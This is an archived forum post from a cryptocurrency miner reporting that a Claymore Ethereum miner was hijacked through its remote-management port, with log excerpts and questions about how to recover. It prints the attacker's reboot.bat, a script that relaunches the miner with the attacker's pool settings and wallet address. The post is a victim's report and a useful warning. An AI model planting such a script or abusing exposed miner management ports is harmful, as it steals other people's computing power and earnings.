Ninjastic
PostEdited versionsQuotes to this post
Post
Topic
Board Altcoin Discussion
Re: Beware of Increasingly Sophisticated Malware Infection Attempts
by
phila
on 14/04/2017, 13:20:27 UTC
My ethmining is being hijacked.

Ok so this morning after waking up one of my rigs was mining on nicehash, but I was mining on miningpoolhub and didn't specify a failover.  In my logs I discovered reboot.bat file was uploaded through ethman.exe and ran remotely.

I reckon that's why Claymore said in his readme:
"Warning: use negative option value or disable remote management entirely if you think that you can be attacked via this port!"

I had it on a positive number in order to manage, but how did a hacker get access over the internet to manage my miner. I consider myself paranoid careful and usually take all precautions.  Is this a mistake on my side or is it just that easy to access someone's EthDcrMiner64 remotely? Does this mean files might be compromised or is it more like someone has my external IP, will a vpn make a difference? Any advice is appreciated.

I replaced my Claymore folder with a new one and made most files inside read-only, but how do I know I am not still compromised, how much access does this hacker have now and what should I do to ensure further safety?  As you can see inside the reboot.bat file the hacker's bitcoin address: "1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M" is busy stealing quite a nice sum of equihash at the moment.

02:00:08:453   6f2c   Remote management: file reboot.bat was downloaded
02:00:08:454   6f2c   srv bs: 0
02:00:08:454   6f2c   sent: 40
02:00:09:231   17d8   GPU0 t=79C fan=32%, GPU1 t=79C fan=31%
xxxxxxxxx
xxxxxxxxx
xxxxxxxxx
02:00:09:887   397c   ETH: 04/14/17-02:00:09 - New job from europe.ethash-
hub.miningpoolhub.com:17020
02:00:09:887   397c   target: 0x0000000112e0be82 (diff: 4000MH), epoch #117
02:00:09:888   397c   ETH - Total Speed: 53.104 Mh/s, Total Shares: 19, Rejected: 0, Time:

00:22
02:00:09:888   397c   ETH: GPU0 26.859 Mh/s, GPU1 26.244 Mh/s
02:00:09:889   397c    DCR - Total Speed: 1593.105 Mh/s, Total Shares: 123, Rejected: 1
02:00:09:889   397c    DCR: GPU0 805.781 Mh/s, GPU1 787.324 Mh/s
02:00:10:231   406c   recv: 73
02:00:10:232   406c   srv pck: 73
02:00:10:232   406c   Remote management: file reboot.bat was uploaded
02:00:10:232   406c   srv bs: 0
02:00:10:233   406c   sent: 682
02:00:10:604   7608   recv: 51
xxxxxxxxxx
02:00:13:363   689c   Remote management required restart
02:00:13:364   689c   Rebooting
02:00:13:377   4630   srv bs: 0
02:00:13:377   4630   sent: 210

==================reboot.bat========================
"C:\guiminer-scrypt_win32_binaries_v0.04\cgminer\Claymore-4.1\EthDcrMiner64.exe" -epool stratum

+tcp://daggerhashimoto.hk.nicehash.com:3353 -ewal 1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -epsw x -

esm 3 -allpools 1 -estale 0 -dpool stratum+tcp://decred.eu.nicehash.com:3354 -dwal

1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -dpsw x